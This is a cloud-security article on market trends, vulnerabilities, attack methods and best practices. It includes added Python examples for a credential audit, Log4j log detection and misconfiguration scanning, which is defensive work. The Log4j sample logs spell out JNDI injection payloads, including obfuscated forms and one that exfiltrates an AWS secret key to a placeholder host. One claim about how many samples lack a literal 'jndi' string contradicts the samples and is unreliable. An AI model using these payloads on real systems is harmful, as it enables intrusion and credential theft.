By Joseph Saracino, President and Chief Executive Officer at Cino Security Solutions
The use of cloud systems has been growing steadily, and for good reason: they offer ease of deployment, agility, scalability, and cost-effectiveness. They are not, however, without risk. The very features that make them popular with organizations also make them prime targets for cybercriminals, and the proliferation of hybrid and multi-cloud environments has only widened the attack surface. According to the CrowdStrike 2022 Global Threat Report, ransomware-related data leaks increased by 82% and interactive intrusion campaigns by 42% from 2020 to 2021. Understanding the current cyber market as it relates to cloud systems, the risks associated with them, how cybercriminals exploit them, and what measures mitigate those risks is critical for Chief Information Security Officers (CISOs) and Information Technology (IT) professionals, especially those serving cloud-centric organizations.
Cybersecurity and the Cloud
Data presented in the Markets & Markets report Cloud Security Market Size (2022-2026) projects that the global cloud security market will grow from USD 40.8 billion in 2021 to USD 77.5 billion by 2026, a Compound Annual Growth Rate (CAGR) of 13.7% over that period. That projection is consistent with the steady rise in cloud adoption. OTAVA reported that in 2021, 87% of enterprises had already adopted hybrid cloud strategies in order to combine the public cloud with the security of a private, on-premises cloud environment. The Flexera 2020 State of the Cloud Report stated that 93% of enterprises were using a multi-cloud strategy. Along with the growth in cloud deployments has come a rise in cyber-attacks against them. A 2021 IDC survey of 200 CISOs found that 98% had experienced at least one cloud data breach in the previous 18 months, versus 79% in 2020. Further, 67% of them had experienced three or more breaches, and 63% had sensitive data exposed. That is not surprising given the many vulnerabilities associated with cloud systems.
What Makes Cloud Systems Vulnerable?
Cloud systems were vulnerable before the pandemic, but the pandemic has put them even more at risk. The rise in remote working and the use of home-based devices, the additional use of cloud collaboration tools (e.g., Cisco Webex), and the increase in video-conferencing (e.g., Microsoft Teams and Zoom) have all increased cloud systems' cyber risk. The inherent complexity of cloud computing solutions and models (e.g., Software as a Service, Infrastructure as a Service) makes it challenging to identify unknown threats in the cloud infrastructure. There are also protocol and procedural shortcomings that prevail in many organizations using the cloud. Among them are:
- Failing to keep older cloud infrastructure that is scheduled for retirement current with security configuration updates, and failing to remove sensitive data from those systems before they are decommissioned
- Failing to deploy multi-factor authentication (MFA) and to disable legacy authentication protocols that do not support MFA (an attacker who can authenticate over a legacy protocol bypasses MFA entirely)
- Failing to establish sufficient identity, credential, access, and key management, including control over impersonation privileges, passwords, and certificate-based credentials for users and cloud service managers
- Failing to deploy a strong cloud security posture management solution that keeps detailed logs and alerts both cloud security and operations staff
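The identity and credential shortcomings in the list above are the kind of thing a short, repeatable audit catches. The following is an added example, not code from the original article or from Cino Security Solutions: it reads a credential report in the column layout AWS IAM produces (the columns and values here are a constructed subset, not real account data) and flags console users without MFA, dormant console users, and access keys that are stale or unused. The thresholds and the fixed "current time" are assumptions chosen for the example; other providers expose equivalent data through their own identity reports.

```python
import csv
import io
from datetime import datetime, timedelta, timezone

# Fixed reference time so the example is deterministic (assumption for the example).
NOW = datetime(2022, 6, 1, tzinfo=timezone.utc)
MAX_KEY_AGE = timedelta(days=90)   # rotate long-lived access keys at least quarterly
MAX_IDLE = timedelta(days=45)      # credentials unused this long are dormant

# Constructed sample in the column layout of an AWS IAM credential report
# (subset of columns; not data from any real account).
SAMPLE_REPORT = """user,password_enabled,password_last_used,mfa_active,access_key_1_active,access_key_1_last_rotated,access_key_1_last_used_date
<root_account>,true,2022-05-30T08:12:00+00:00,false,false,N/A,N/A
alice,true,2022-05-31T10:02:00+00:00,true,true,2022-04-20T09:00:00+00:00,2022-05-31T10:05:00+00:00
bob,true,2022-01-14T11:20:00+00:00,false,false,N/A,N/A
ci-deploy,false,not_supported,false,true,2021-09-03T07:00:00+00:00,2022-05-31T02:00:00+00:00
old-contractor,false,not_supported,false,true,2021-12-01T12:00:00+00:00,2022-02-01T12:00:00+00:00
"""


def _parse_ts(value):
    """Credential reports use sentinel strings instead of empty fields."""
    if value in ("N/A", "no_information", "not_supported", ""):
        return None
    return datetime.fromisoformat(value)


def audit(report_csv, now=NOW):
    """Return (user, finding) pairs for every credential-hygiene problem found."""
    findings = []
    for row in csv.DictReader(io.StringIO(report_csv)):
        user = row["user"]

        # Console login enabled but no MFA; for <root_account> this is the worst case.
        if row["password_enabled"] == "true" and row["mfa_active"] != "true":
            findings.append((user, "console-no-mfa"))

        if row["access_key_1_active"] == "true":
            rotated = _parse_ts(row["access_key_1_last_rotated"])
            if rotated is None or now - rotated > MAX_KEY_AGE:
                findings.append((user, "stale-access-key"))
            last_used = _parse_ts(row["access_key_1_last_used_date"])
            if last_used is None or now - last_used > MAX_IDLE:
                findings.append((user, "unused-access-key"))

        # A console password that has not been used recently belongs to a dormant
        # account: disable it rather than leave it as a standing target.
        if row["password_enabled"] == "true":
            pw_used = _parse_ts(row["password_last_used"])
            if pw_used is None or now - pw_used > MAX_IDLE:
                findings.append((user, "dormant-console-user"))
    return findings


if __name__ == "__main__":
    for user, finding in audit(SAMPLE_REPORT):
        print(f"{user:<16} {finding}")
```

Running it against the constructed report flags the root account and bob for console access without MFA, bob as dormant, and the two service users for keys older than 90 days, one of which has also not been used in over 45 days. In production the report would come from the provider's API rather than an inline string, and the findings would feed the alerting that the last list item calls for.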
Additionally, many cloud platforms are not set up and configured properly. High on the list of features that make cloud systems prone to cyber-attacks are:
- The granularity of cloud access control, which makes it difficult for individuals to understand, manage, and secure the countless elements involved (hundreds of workloads, devices, credentials, etc.)
- Misconfigured cloud platforms and misconfigured identity and access management; because of the cloud's scalability, a single misconfiguration can be replicated many times over and across many systems
- The shared-responsibility model (security responsibility divided between the organization and the cloud vendor), which leaves the oversight and remediation of errors poorly managed when neither party is clear on where its duties end
- Lack of visibility into which data lives in which cloud applications, and applications being provisioned in ways that make them invisible to IT staff
These and other vulnerabilities have made it easy for cybercriminals to penetrate a cloud system.
How Cyber Criminals Attack the Cloud
Cybercriminals have many tactics for attacking a cloud system. They range from exploiting remote code execution (RCE) vulnerabilities in server software to stealing credentials, deploying credential-based intrusions, and then accessing victims’ accounts, cloud-hosted email, or file-hosting services.
Another avenue for attack is an organization's cloud service providers (CSPs). By gaining and then abusing the trust of a CSP, cybercriminals can gain access to an organization's enterprise authentication resources hosted in the cloud, and potentially gain privileges that let them attack multiple tenants of a single CSP. They can further wreak havoc by delivering malware to cloud hosting services in ways that bypass signature-based detection. By injecting malicious code into an enterprise's web applications, cybercriminals can harvest financial information from the site's users, which in turn can cause significant liabilities, regulatory penalties, reputational damage, and loss of customers.
Cybercriminals also take advantage of misconfigured Docker containers and vulnerabilities in the cloud infrastructure's layered software. These exploits let them move easily across a cloud service platform while evading security monitoring tools. Another attack vector is the exploitation of newly disclosed (near-zero-day) vulnerabilities in widely deployed components, such as the Log4j logging package for Java, to reach the cloud platform's metadata service and steal CSP credentials from it.
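Exploitation of the Log4j issue mentioned above travels through the logs themselves: the attacker plants a `${jndi:...}` lookup in any field the application logs (User-Agent is the usual one), and variants wrap it in nested lookups to slip past naive string matching. The following is an added detection example, not code from the original article or from Cino Security Solutions. It normalizes the common obfuscations (`${lower:x}`, `${upper:x}`, and the empty-prefix default form `${::-x}`) before matching, and separately flags lookups that embed environment-variable references, since those are the form used to exfiltrate cloud access keys through the callback hostname. The log lines are constructed for the example; the address 203.0.113.7 is from the documentation range and is not a real host.

```python
import re

# Constructed web-server access log lines (not from any real system).
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:14:02:12 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:13 +0000] "GET /login HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.7:1389/b}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:14 +0000] "GET /api HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.7:1099/c}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:15 +0000] "GET /x HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7/${env:AWS_SECRET_ACCESS_KEY}}"',
]

# Innermost lookups only (no nested ${ } inside the braces), resolved from the
# inside out by repeated substitution.
_LOWER = re.compile(r"\$\{lower:([^${}]*)\}", re.IGNORECASE)
_UPPER = re.compile(r"\$\{upper:([^${}]*)\}", re.IGNORECASE)
_DEFAULT = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")   # ${anything:-value} and ${::-value} -> value

# After normalization the lookup reads ${jndi:<scheme>:...}.
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+):", re.IGNORECASE)
# Lookups that read process state; inside a JNDI URL they mean exfiltration.
EXFIL = re.compile(r"\$\{(env|sys|java|ctx):", re.IGNORECASE)


def normalize(text, max_rounds=10):
    """Collapse nested lookup obfuscation until the string stops changing."""
    for _ in range(max_rounds):
        new = _LOWER.sub(lambda m: m.group(1).lower(), text)
        new = _UPPER.sub(lambda m: m.group(1).upper(), new)
        new = _DEFAULT.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def scan(lines):
    """Return one finding per log line carrying a JNDI lookup."""
    findings = []
    for number, raw in enumerate(lines, 1):
        norm = normalize(raw)
        match = JNDI.search(norm)
        if not match:
            continue
        findings.append({
            "line": number,
            "scheme": match.group(1).lower(),       # ldap, rmi, dns, ...
            "exfil": bool(EXFIL.search(norm)),       # credential reference embedded
        })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOGS):
        print(f"line {f['line']}: jndi scheme={f['scheme']} exfil={f['exfil']}")
```

Two points for anyone wiring this into a pipeline: the normalization must run before matching, since three of the four hits above contain no literal `jndi` substring, and a hit carrying an `${env:...}` or `${sys:...}` reference should be treated as a credential-theft attempt, which means rotating the keys of the affected workload, not just blocking the source address.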
Most seasoned cyber security professionals will say that it is not a matter of if, but when, an organization will experience a cyber-attack. That makes it vital for those with cloud systems to adopt measures that minimize their risk. The following are among the best practices to implement:
- Gain up-to-date cyber threat intelligence and share it with your staff, board members, and any vendors with access to your cloud and IT infrastructure (e.g., CSPs, managed service providers, maintenance firms, etc.). Take measures against any new threats.
- Adopt best practices (i.e., identity and access management, key management, etc.) in cyber security, including staff education and training on common cyber-attacks.
- Design cloud deployments with threat mitigation in mind from the beginning by making certain to secure key areas (i.e., workloads, containers, applications, file storage) against potential criminal exploitation.
- Deploy cyber security solutions that provide automated detection and remediation, and vulnerability management. Next-generation endpoint protection for servers, workstations, and mobile devices is critical. In doing so, strive to reduce the number of tools being used for IT analysis, while delivering visibility of the cloud’s operations.
- Correct any and all configuration errors. Apply technologies that continuously scan for misconfigurations to promote real-time remediations. If necessary, establish a new cloud infrastructure with defaults that facilitate the easy adoption of secure operations. Create new sub-accounts and subscriptions in an intuitive way to reduce common human errors.
- Apply a Cloud Security Posture Management (CSPM) tool that keeps cloud operations and security teams alerted to potential vulnerabilities. To support this tactic, either decommission shadow IT cloud environments or bring them under management.
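The misconfiguration points raised earlier (a single error replicated across many systems) and the last two recommendations above (continuous misconfiguration scanning, a CSPM tool that alerts on findings) come down to the same mechanism: pull every resource's configuration and run it through a set of checks. The following is an added example of that mechanism, not code from the original article, from Cino Security Solutions, or from any CSPM product. It scans a constructed inventory of bucket policies, an identity policy and security groups for anonymous access, wildcard administrative grants and management ports exposed to the Internet. The policy documents use IAM's JSON policy grammar; the security-group shape is a simplified one assumed for the example, and all names, account IDs and endpoint IDs are made up.

```python
# Constructed inventory in the shape a CSPM collector would return
# (names, account ID and VPC endpoint ID are invented for the example).
SAMPLE_RESOURCES = [
    {"type": "bucket_policy", "name": "public-assets", "policy": {
        "Version": "2012-10-17",
        "Statement": [{"Effect": "Allow", "Principal": "*",
                       "Action": "s3:GetObject",
                       "Resource": "arn:aws:s3:::public-assets/*"}]}},
    {"type": "bucket_policy", "name": "uploads", "policy": {
        "Version": "2012-10-17",
        "Statement": [{"Effect": "Allow", "Principal": {"AWS": "*"},
                       "Action": ["s3:GetObject", "s3:PutObject"],
                       "Resource": "arn:aws:s3:::uploads/*"}]}},
    {"type": "bucket_policy", "name": "logs", "policy": {
        "Version": "2012-10-17",
        "Statement": [{"Effect": "Allow", "Principal": "*",
                       "Action": "s3:GetObject",
                       "Resource": "arn:aws:s3:::logs/*",
                       "Condition": {"StringEquals": {"aws:SourceVpce": "vpce-0abc1234"}}}]}},
    {"type": "identity_policy", "name": "admin-role", "policy": {
        "Version": "2012-10-17",
        "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}]}},
    {"type": "security_group", "name": "web", "ingress": [
        {"from_port": 443, "to_port": 443, "cidr": ["0.0.0.0/0", "::/0"]}]},
    {"type": "security_group", "name": "bastion", "ingress": [
        {"from_port": 22, "to_port": 22, "cidr": ["0.0.0.0/0"]}]},
    {"type": "security_group", "name": "legacy", "ingress": [
        {"from_port": 0, "to_port": 65535, "cidr": ["::/0"]}]},
]

# Actions that, granted to anyone, allow tampering rather than just reading.
WRITE_ACTIONS = {"*", "s3:*", "s3:putobject", "s3:deleteobject", "s3:putbucketpolicy"}
ANYWHERE = {"0.0.0.0/0", "::/0"}
ADMIN_PORTS = (22, 3389)


def _as_list(value):
    """IAM allows a string or a list in most fields; treat both uniformly."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _principal_is_anyone(principal):
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS"))
    return False


def check_policy(policy):
    issues = []
    for stmt in _as_list(policy.get("Statement")):
        if stmt.get("Effect") != "Allow":
            continue
        actions = [a.lower() for a in _as_list(stmt.get("Action"))]
        # An unconditioned Allow to principal "*" is reachable by anyone on the
        # Internet; a Condition (VPC endpoint, source IP) scopes it and is left
        # for manual review rather than flagged here.
        anonymous = _principal_is_anyone(stmt.get("Principal")) and not stmt.get("Condition")
        if anonymous and any(a in WRITE_ACTIONS or a.endswith(":*") for a in actions):
            issues.append("anonymous-write")
        elif anonymous:
            issues.append("anonymous-read")
        if "*" in actions and "*" in _as_list(stmt.get("Resource")):
            issues.append("admin-wildcard")
    return issues


def check_security_group(group):
    issues = []
    for rule in group.get("ingress", []):
        if not ANYWHERE.intersection(_as_list(rule.get("cidr"))):
            continue
        low, high = rule.get("from_port", 0), rule.get("to_port", 65535)
        if low == 0 and high == 65535:
            issues.append("all-ports-open-to-internet")
        elif any(low <= port <= high for port in ADMIN_PORTS):
            issues.append("admin-port-open-to-internet")
    return issues


def scan(resources):
    """Map resource name -> list of issues, for resources that have any."""
    report = {}
    for res in resources:
        if res["type"] in ("bucket_policy", "identity_policy"):
            issues = check_policy(res["policy"])
        elif res["type"] == "security_group":
            issues = check_security_group(res)
        else:
            issues = []
        if issues:
            report[res["name"]] = issues
    return report


if __name__ == "__main__":
    for name, issues in scan(SAMPLE_RESOURCES).items():
        print(f"{name:<14} {', '.join(issues)}")
```

The `logs` bucket and the `web` security group pass on purpose: a wildcard principal scoped by a VPC-endpoint condition and HTTPS open to the world are normal, and a scanner that flags them trains teams to ignore its output. The value of running checks like these continuously rather than once is exactly the replication problem noted earlier: a bad template produces the same finding in every account it was deployed to, and the scan shows the blast radius.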
For all their advantages, cloud systems and their vulnerability to cyber-attacks demand a strategic and tactical approach. Neither technology alone nor best practices alone are enough. There needs to be a holistic approach that starts by prioritizing cloud security and engages the entire organization and its relevant vendors. By understanding the risks and threat vectors, and deploying a comprehensive strategy, cloud-centric organizations can establish a strong risk mitigation position.
Joseph Saracino is the president and chief executive officer of Cino Security Solutions (https://www.cinoltd.com), a trusted advisory firm on cybersecurity for organizations across diverse industries. Saracino leverages his extensive experience as a former Military Intelligence Commander to lead Cino’s cyber security operations. He also serves as a consultant to the U.S. Department of Homeland Security, Joint Military Task Force Commands, and is an active member of the Suffolk County Police Department’s SHIELD, a Counter-Terrorism and Anti-Crime program in partnership with the New York Police Department and law enforcement agencies across the nation. You can reach him at: email@example.com.